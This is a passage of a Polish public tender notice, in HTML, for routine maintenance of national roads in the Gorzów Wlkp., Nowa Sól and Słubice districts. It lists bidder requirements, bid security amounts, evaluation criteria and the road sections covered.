              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 

b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;

c) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wykonawca  może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane, do realizacji których te zdolności są wymagane.
4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt III.3 Ogłoszenia 
5. W celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający może żądać dokumentów, które określają w szczególności:
1)zakres dostępnych Wykonawcy zasobów innego podmiotu;
2)sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego;
3)zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
4)czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.
6.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt III.5.1) Ogłoszenia
7.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,  oświadczenie, o którym mowa w pkt. III.3 ogłoszenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
8.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia o których mowa w pkt III.5.1 Ogłoszenia, przy czym dokumenty i oświadczenia o których mowa w pkt 9.7.1) składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt III.5.1.
Wraz z ofertą i jej załącznikami, oprócz oświadczeń, o których mowa w pkt. III.3 należy złożyć: 
a)Zobowiązania wymagane postanowieniami pkt III.7), w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu; 
b)Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii; 
c) Dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne Dz.U. z 2014 poz. 1114 oraz z 2016 poz. 352), a Wykonawca wskazał to wraz ze złożeniem oferty; d) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz; e) Kosztorysy ofertowe 
10. W terminie określonym w art. 24 ust.11 ustawy Pzp wykonawcy zobowiązani są złożyć oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności, braku przynależności do tej samej grupy kapitałowej.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
Część nr 1  20 000,00 zł (słownie: dwadzieścia tysięcy złotych),
Część nr 2  30 000,00 zł (słownie: trzydzieści tysięcy złotych),
Część nr 3  14 000,00 zł (słownie: czternaście tysięcy złotych),
Część nr 4  13 000,00 zł (słownie: trzynaście tysięcy złotych),
Część nr 5   1 500,00 zł (słownie: jeden tysiąc pięćset złotych),
Część nr 6   1 000,00 zł (słownie: jeden tysiąc złotych),
Część nr 7   1 500,00 zł (słownie: jeden tysiąc pięćset złotych),
Część nr 8   1 500,00 zł (słownie: jeden tysiąc pięćset złotych).
16.2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a)pieniądzu, przelewem na rachunek bankowy: 
41 113012220030203604200005 (w tytule przelewu należy wpisać sygnaturę przetargu O.ZG.D3.2412.10.2016.)
b)poręczeniach bankowych;
c)poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d)gwarancjach bankowych;
e)gwarancjach ubezpieczeniowych;
f)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 poz. 1804 oraz z 2015 poz. 978 i 1240).
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja jakości</td><td>20</td></tr><tr><td>doświadczenie kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z postępowaniami zawartymi z projekcie umowy(SIWZ TOM II).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/11/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Zamówienie jest finansowane ze środków krajowych będących w dyspozycji Generalnego Dyrektora Dróg Krajowych i Autostrad - środki budżetowe bieżące 
2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania przez Wykonawcę firm podwykonawców, zgodnie z pkt 10.8 IDW. Pozostałe wymagania dotyczące podwykonawstwa zostały określone w Tomie II SIWZ  Projekt umowy. 
3. Uwaga do sekcji IV, część IV.2.2) Kryteria oceny ofert. Cena 60%; Gwarancja jakości 20%: Doświadczenie kierownika robót 20%. Kryterium Gwarancja jakości: dla części 1-4 - Element Przedmiotu Umowy  Remont cząstkowy nawierzchni bitumicznej masą mineralno  asfaltową na gorąco, będzie posiadało termin gwarancji jakości określony przez Wykonawcę w Formularzu Oferty podlegający ocenie w ramach kryterium Gwarancja jakości, który wynosić będzie 12-18 miesięcy liczone od dnia podpisania Protokołu Odbioru Częściowego robót bez wad istotnych. Wykonawca może zaproponować okres Gwarancji jakości w pełnych miesiącach, tj. 12, 15 lub 18 miesięcy: Punktacja G= 20 pkt otrzyma Wykonawca, który w ofercie wskaże 18 miesięczny okres Gwarancji jakości; G= 10 pkt otrzyma Wykonawca, który w ofercie wskaże 15 miesięczny okres Gwarancji jakości; G= 0 pkt otrzyma Wykonawca, który w ofercie wskaże 12 miesięczny okres Gwarancji jakości: dla części 1-4 najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego: 36 miesięcy od daty wystawienia Protokołu odbioru częściowego. Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 60 miesięcy od daty wystawienia Protokołu Odbioru Końcowego. Wykonawca może zaproponować okres Gwarancji jakości w pełnych miesiącach, tj. 36, 48 lub 60 miesięcy: G=20 pkt otrzyma Wykonawca, który w ofercie wskaże 60 miesięczny okres Gwarancji jakości; G=10 pkt otrzyma Wykonawca, który w ofercie wskaże 48 miesięczny okres Gwarancji jakości; G=0 pkt otrzyma Wykonawca, który w ofercie wskaże 36 miesięczny okres Gwarancji jakości. W zakresie kryterium - Doświadczenie kierownika robót dla cz. 1-4, ocena będzie odbywać się w oparciu o dokument sporządzony według wzoru Formularza nr 2.2a.: Informacje dot. doświadczenia Kierownika robót. Dokument ten winien zawierać wykaz zadań polegających na wykonaniu budowy lub przebudowy lub remontu lub pracach w ramach bieżącego utrzymania dróg na drogach klasy minimum G o wartości minimum 200.000 zł brutto przy realizacji których (od rozpoczęcia robót do ich zakończenia wydaniem Świadectwa Przejęcia lub Protokołu odbioru robót 
lub równoważnego dokumentu w przypadku zamówień, w których nie wystawiano Świadectwa Przejęcia) wskazana osoba na stanowisko Kierownika robót przy realizacji niniejszego zamówienia zdobyła doświadczenie na stanowisku Kierownika Robót lub Kierownika Budowy. Liczba punktów w ramach kryterium Doświadczenie Kierownika robót zostanie przyznana następująco: Doświadczenie Kierownika robót/budowy: doświadczenie w realizacji 2 zadania  0 pkt; Doświadczenie Kierownika robót/budowy: doświadczenie w realizacji 3 zadania  10 pkt; Doświadczenie Kierownika robót budowy: doświadczenie w realizacji 4 zadania  20 pkt. Dla cz. 5-8, Ocena odbywać się będzie w oparciu o dokument sporządzony według wzoru Formularza nr 2.2b.: Informacje dot. doświadczenia Kierownika robót. Dokument ten winien zawierać wykaz zadań polegających na budowie lub przebudowie lub remoncie obiektu mostowego lub pracach remontowych w ramach bieżącego utrzymania drogowych obiektów inżynierskich o wartości minimum 80.000 zł brutto przy realizacji których (od rozpoczęcia robót do ich zakończenia wydaniem Świadectwa Przejęcia lub Protokołu odbioru robót lub równoważnego dokumentu w przypadku zamówień, w których nie wystawiano Świadectwa Przejęcia) wskazana osoba na stanowisko Kierownika robót przy realizacji niniejszego zamówienia zdobyła doświadczenie na stanowisku Kierownika Robót lub Kierownika Budowy. Liczba punktów w ramach kryterium Doświadczenie Kierownika robót zostanie przyznana następująco: Doświadczenie Kierownika robót: doświadczenie w realizacji 3 zadań  0 pkt; Doświadczenie Kierownika robót: doświadczenie w realizacji 4 zadań  10 pkt; Doświadczenie Kierownika robót: doświadczenie w realizacji 5 zadań  20 pkt. Ocena w ramach kryterium odbywać się będzie w oparciu o dokument sporządzony wg wzoru  Formularze 2.2. Wykonawca, przed podpisaniem umowy, zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na kwotę stanowiącą 10% ceny brutto podanej w ofercie.
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a 24, 24a S3f, S3a.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a 24, 24a S3f, S3a.
W szczególności prace dotyczyć będą robót drogowych, robót w zakresie nawierzchni dróg, oznakowania drogowego, utrzymywania porządku.
CZĘŚĆ NR 1: Rejon w Gorzowie Wlkp.  ogółem  138,690 km 
Obwód Drogowy w Skwierzynie   67,551 km
- droga krajowa nr 22
  odcinek od km   28+288 do km   53+479 = 25,191 km
- droga krajowa nr 22a
  odcinek od km   0+000 do km    3+163 =  3,163
- droga krajowa nr 24
  odcinek od km   30+271 do km   52+241 = 21,970 km
  odcinek od km   54+343 do km   69+335 = 14,992 km
- droga krajowa 24a
  odcinek od km 0+000 do km 1+707 = 1,707 km
  łącznica z drogą krajową nr 24a 0,528 km 

Obwód Drogowy w Strzelcach Kraj.   54,835 km
- droga krajowa nr 22
  odcinek od km 64+778 do km 119+613 = 54,835 km 

Obwód Utrzymania Drogi w Baczynie  16,300 km
- droga ekspresowa  S3a  
  odcinek od km 80+942 do km 81+942 = 1,000 km
  odcinek od km 92+171 do km 92+602 = 0,431
- droga ekspresowa  S3f
  odcinek od km 0+000 do km  10+229 =   10,229 km 
  łącznice na węzłach (Małyszyn i Kostrzyński) = 3,038 km
  łącznice na węźle Kasprzaka  =   1,6 km   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233140-2,
                    45233220-7,
                    45233221-4,
                    45232410-9,
                    45233290-8,
                    45233292-2,
                    77211400-6,
                    77211500-7,
                    77310000-6,
                    90610000-6,
                    34992200-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: 
Drogi 22, 22a, 24, 24a od 01.01.2017 r. do 30.04.2017 r. 
Droga S3a, S3f od 01.06.2017 r. do 30.09.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi S3, 3, 3g, 27, 32, 32a.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi S3, 3, 3g, 27, 32, 32a.
W szczególności prace dotyczyć będą robót drogowych, robót w zakresie nawierzchni dróg, oznakowania drogowego, utrzymywania porządku.
CZĘŚĆ NR 2: Rejon w Nowej Soli.  ogółem  135,105 km 
Obwód Drogowy w Nowej Soli: 73,798 km
- droga ekspresowa nr S-3 
  od km 273+035 do km 308+610 = 35,575 km
  druga jezdnia = 2,702 km
 - droga krajowa nr 3
   od km 315+578 do km 334+291 = 18,713 km
- droga krajowa nr 3g
- od km 0+000 do km 3+510 = 3,510 km
- węzeł Północna łącznice = 2,219 km
- węzeł Racula łącznice =  7,111 km
- węzeł Niedoradz łącznice =  1,750 km
- węzeł Nowa Sól łącznice =  2,063 km
- odc. drogi od nr 283 do 3  = 0,155 km
 Obwód Drogowy w Raculi: 61,307 km
- droga krajowa nr 27
  od km 37+917 do km 63+808 = 25,891 km
- droga krajowa nr 32
  od km 46+087 do km 58+466 = 12,379 km
  od km 66+461 do km 67+054 = 0,593 km
  druga jezdnia                         =  0,397 km
  od km 71+567 do km 89+945 = 18,378 km
- droga krajowa nr 32a
  Od km 0+250 do km 3+919 = 3,669 km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233140-2,
                    45233220-7,
                    45233221-4,
                    45232410-9,
                    45233290-8,
                    45233292-2,
                    77211400-6,
                    77211500-7,
                    77310000-6,
                    90610000-6,
                    34992200-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: 
Drogi 27, 32, 32a od 01.01.2017 r. do 30.04.2017 r.
Drogi S3,3,3g od 01.01.2017 r. do 31.12.2018 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach  obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach  obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.
W szczególności prace dotyczyć będą robót drogowych, robót w zakresie nawierzchni dróg, oznakowania drogowego, utrzymywania porządku.
CZĘŚĆ NR 3: Rejon w Słubicach  ogółem  255,720 km 
Obwód Drogowy w Słubicach   64,616 km
- droga krajowa nr 22
  odcinek od km   0+000 do km  14+729 = 14,729 km
